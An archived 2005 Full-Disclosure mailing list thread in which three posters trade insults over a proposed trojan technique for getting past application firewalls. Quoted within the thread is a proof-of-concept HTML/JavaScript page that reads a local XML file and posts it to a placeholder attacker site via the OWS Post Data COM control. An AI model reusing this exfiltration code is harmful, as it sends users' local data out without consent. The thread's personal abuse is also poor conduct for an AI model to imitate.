[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data

To: "'name pipe'" <namepipe@xxxxxxxxx>
Subject: RE: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data
From: "Debasis Mohanty" <mail@xxxxxxxxxxxxxxxxxx>
Date: Thu, 22 Dec 2005 23:26:27 +0530

You surely must be a clone of Gaurav !! Ain't you ?? 
 
> name pipe [mailto:namepipe@xxxxxxxxx] brazenly wrote:
>> Before flaming others just look at urself.  wtf u do moron debasis , sell
nessus reports for 5K, without even removing false +ives ?? 
 
lol !! Is that what you do ??
 
>> This is ur elite resume ->
http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical
Hacker ???? omfg. 
 
Certainly, like many others I was also one time looking for a good break and
moreover I just wanted to have a web based copy on a security jobs site. I
am glad that my resume made you laugh. 
 
 
>> You trying to be next fadia or wat ? 
 
I never have to become like someone else.... I'm pretty much happy with my
own identity. 
 
>> Do you want me to post ur lame Firewall bypass vulnerabilities links
which have been already founded  years before?
 
Is that the one that one, which many securitysites released as an advisory
including the vendor himself. Why you, infact I wud be glad to post it
again. 
http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html
 
Also don't forget to refer those CVE, BID, FrSIRT, OSVDB, Secunia,
Securiteam,  ISS X-Force, US-CERT reference link on my site. They might help
you clarify your doubt. 
 
>> Basically u are an asshole. So stfu.
 
Is this statement phrased using both gaurav's and ur's l33t skils?? :P 
 
- D

 
 
  _____  

From: name pipe [mailto:namepipe@xxxxxxxxx] 
Sent: Thursday, December 22, 2005 10:54 PM
To: Debasis Mohanty
Cc: Gaurav Kumar; full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] new attack technique? using
JavaScript+XML+OWSPost Data


Before flaming others just look at urself.  wtf u do moron debasis , sell
nessus reports for 5K, without even removing false +ives ?? 
This is ur elite resume ->
http://seclists.org/lists/security-jobs/2003/Oct/0156.html hahaha Ethical
Hacker ???? omfg. You trying to be next fadia or wat ? Do you want me to
post ur lame Firewall bypass vulnerabilities links which have been already
founded  years before?

Basically u are an asshole. So stfu.


On 12/22/05, Debasis Mohanty <mail@xxxxxxxxxxxxxxxxxx> wrote: 

Keep it up moron !!

> oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years 
> kidder than u)

Shit !! Another several years ppl has to tolerate your stupidity till you
actuall _grow up_.

> Tell me one thing, a Windows XP + Offfice XP + Internet explorer
> combination so rare ? 

Is this a new topic ?? I mean are you done with your firewall and some
weired trojan design :P


- D


-----Original Message-----
From: gkverma@xxxxxxxxx [mailto:gkverma@xxxxxxxxx] On Behalf Of Gaurav Kumar
Sent: Thursday, December 22, 2005 10:23 PM
To: Debasis Mohanty
Cc: full-disclosure@xxxxxxxxxxxxxxxxx
<mailto:full-disclosure@xxxxxxxxxxxxxxxxx> 
Subject: Re: [Full-disclosure] new attack technique? using
JavaScript+XML+OWSPost Data

typo- i am 22 and YOU ARE 27, so i am 5 years kidder than u.

On 12/22/05, Gaurav Kumar < gaurav@xxxxxxxxxxxxx
<mailto:gaurav@xxxxxxxxxxxxx> > wrote:
> oh yes, i am a kid compared to u (i am 22 and 27, so i am 5 years
> kidder than u)
>
> The _real_ thing is that I proved the point.
> U told win xp will give access denied error. I proved u wrong with the 
> proof attached.
> U told above technique wont work...i proved u wrong.
> Tell me one thing, a Windows XP + Offfice XP + Internet explorer
> combination so rare ?
>
> Is that all making ur ego shattered? 
>
> ...and u are no one to decide what should one disuss on this list.
>
> regards,
> gaurav
>
>
>
> On 12/22/05, Debasis Mohanty < mail@xxxxxxxxxxxxxxxxxx
<mailto:mail@xxxxxxxxxxxxxxxxxx> > wrote:
> > Kid,
> > Although I normally don't reply to such frivilous and lame
> > statements but your reply has seriously piss me off.. So dropping
> > few lines, perhaps will help you grow up !! 
> >
> > -----Original Message-----
> > >> From: Gaurav Kumar brazenly wrote:
> >
> > >> Looks like u need to read again what i wrote. I didnt use the
> > >> word 
> > 'spread'.
> >
> > I don't have to !! I can still remember your priceless statements
> > [1] + [2]
> > -
> >
> > [1] A Trojan has been to be placed in a system running an 
> > application [1] firewall like Zone Alarm Pro etc.
> >
> > [2] The target system must be having office XP and the user has to
> > be [2] lured to view a webpage hosted by attacker.
> >
> >
> > ROFL !! May be you could just ask your l33t victim to send you his
> > passwords and other info by email :P Don't forget to send him your
> > l33t email ID - '@ securebox.org <http://securebox.org> '
> >
> >
> > >> [3] Moreover, u need not know if the target system is running ZA
> > >> or
> > not...
> > >> [3] "the technique works even if firewall is not installed". 
> >
> > >> [4] I am discussing a possible 'design' of a trojan here, "doesnt
> > >> matter
> > is ZA
> > >> [4] or any other FW is running on client". 
> >
> > Looking at statement [3] & [4], (especially the statement within
> > double
> > quotes) just made me believe that you don't know what your are
> > talking about unless you want to look like an idiot. 
> >
> >
> > >> really? ever heard of IE exploits?
> >
> > Priceless !!
> >
> >
> > >> Well..Exactly! i would suggest u read the 'assumptions' first, 
> > >> its an assumption that user will click yes to warning...like most
'normal'
> > users do.
> >
> > Yet another priceless statement... Maybe you could just ask your
> > l33t victim to click 'yes' to your l33t piece of code trying to 
> > download some l33t piece of shit which will fail to run and die like an
idiot.
> >
> >
> > I am sure you have enough l33t skills to strick back to keep your
> > ego up2date however, I wud rather suggest if you have only your 
> > stupidity to share then feel free to take it offline and don't piss
> > off everyone in this list. I would welcome you if you really want to
> > strike back with some _serious_ technical stuff. (Note: make a note 
> > of _serious_ in the statement)
> >
> > - D
> >
> >
> >
> >
> > -----Original Message-----
> > From: gkverma@xxxxxxxxx [mailto:gkverma@xxxxxxxxx] On Behalf Of
> > Gaurav Kumar
> > Sent: Thursday, December 22, 2005 8:52 AM
> > To: Debasis Mohanty
> > Cc: full-disclosure@xxxxxxxxxxxxxxxxx; websecurity@xxxxxxxxxxxxx
> > Subject: Re: [WEB SECURITY] RE: [Full-disclosure] new attack technique? 
> > using JavaScript+XML+OWSPost Data
> >
> > On 12/22/05, Debasis Mohanty <mail@xxxxxxxxxxxxxxxxxx> wrote:
> > > -----Original Message----- 
> > > From: Gaurav Kumar
> > > Sent: Wednesday, December 21, 2005 8:59 PM
> > > To: full-disclosure@xxxxxxxxxxxxxxxxx
> > > Cc: websecurity@xxxxxxxxxxxxx
> > > Subject: [Full-disclosure] new attack technique? using
> > > JavaScript+XML+OWSPost Data
> > >
> > > 1>> A Trojan has been to be placed in a system running an 
> > > 1>> application firewall like Zone Alarm Pro etc.
> > >
> > > >> Assumptions:
> > >
> > > 2>> The target system must be having office XP and the user has to 
> > > 2>> be lured to view a webpage hosted by attacker.
> > >
> > > 3>> The Trojan can be designed to generate an xml file which will
> > > 3>> contain the data to be sent out. The attacker will lure 
> > > the
> > > 3>> user to visit a website hosted by him.
> > >
> > > Lol !! In a practical scenario, the attacker who spreads the
> > > worm/trojans himself is not aware in the initial stage which are 
> > > the infected machines unless the trojan sends back the
> > > machine/user info back to the attacker. Now as you have already
> > > mentioned ZA is running then no data can be sent back to the 
> > > attacker. So the attacker is clueless
> > which are those infected machines.
> >
> > Looks like u need to read again what i wrote. I didnt use the word
'spread'.
> > Moreover, u need not know if the target system is running ZA or 
> > not...the technique works even if firewall is not installed. I am
> > discussing a possible 'design' of a trojan here, doesnt matter is ZA
> > or any other FW is running on client.
> > 
> > > So the case of luring the user to visit the link is out of scope...
> >
> > really? ever heard of IE exploits?
> >
> > >
> > > >> The site can have following HTML code- 
> > >
> > > Now coming back to technical stuff, You are trying to access a
> > > local file which will only be allowed if the site is in "Trusted
> > > Sites" or "Local Intranet" or "Local Security Zone" and activex not 
marked safe.
> > > The fact that *the client is also the server* is irrelevant.
> > >
> > > Try uploading the script to some webserver and give a html
> > > extention; it will throw an _access denied_ error when the page 
> > > loads (even on Win XP + SP1).
> > >
> > > In case of any server side extention like *.asp, *.jsp etc, the
> > > user will be prompted that an malicious component is trying to 
> > > load and ask for user permission.
> > >
> > >
> > > >> <html>
> > > >> <body>
> > > >> The author is not responsible for any misuse, this PoC is for 
> > > >> educational purpose only.
> > > >> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > > >> id="exp">
> > > >> </object> 
> > > >> <script LANGUAGE=javascript>
> > > >> var xmlDoc
> > > >> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > > >> xmlDoc.async=false ;
> > > >> xmlDoc.load("c:\\note.xml");
> > > >> xmlObj=xmlDoc.documentElement;
> > > >> var a= xmlObj.firstChild.text;
> > > >> exp.Post(0," http://www.attackersite.com/input.asp",a)
<http://www.attackersite.com/input.asp> ;
> > > >> </script>
> > > >> </body>
> > > >> </html> 
> > >
> > >
> > > >> The above code (works well on windows XP SP2) essentials calls
> > > >> "OWS Post Data" COM control to post the contents of note.xml 
> > > >> (generated by trojan) to attackersite.com
> > >
> > > IMHO, never conduct such tests in a "Intranet Zone" or "Local Zone" 
> > > and draw conclusion about "Internet Security Zone".
> > >
> > > You may also link to know about this issue -
> > > http://support.microsoft.com/kb/317244/EN-US/
> > >
> > >
> > > >>> Essentially, the technique is breaking the basic functionality
> > > >>> of application firewalls by using OWS Post Data as bridge for 
> > > >>> sending out the data using Javascript and XML.
> > >
> > > Not Exactly !! I wud rather suggest you to do a little more
> > > research and draw any conclusion. Keep those _Security Zones_ in 
> > > mind before you post anything...
> >
> > Well..Exactly! i would suggest u read the 'assumptions' first, its
> > an assumption that user will click yes to warning...like most 'normal' 
> > users do.
> > >
> > >
> > > - D
> >
> >
> >
>


_______________________________________________
Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/  <http://secunia.com/>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data
  - From: Test Drive

References:
- Re: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data
  - From: name pipe

Prev by Date: Re: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data
Next by Date: Re: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data
Previous by thread: RE: [Full-disclosure] new attack technique? usingJavaScript+XML+OWSPost Data
Next by thread: Re: [Full-disclosure] new attack technique? using JavaScript+XML+OWSPost Data
Index(es):
- Date
- Thread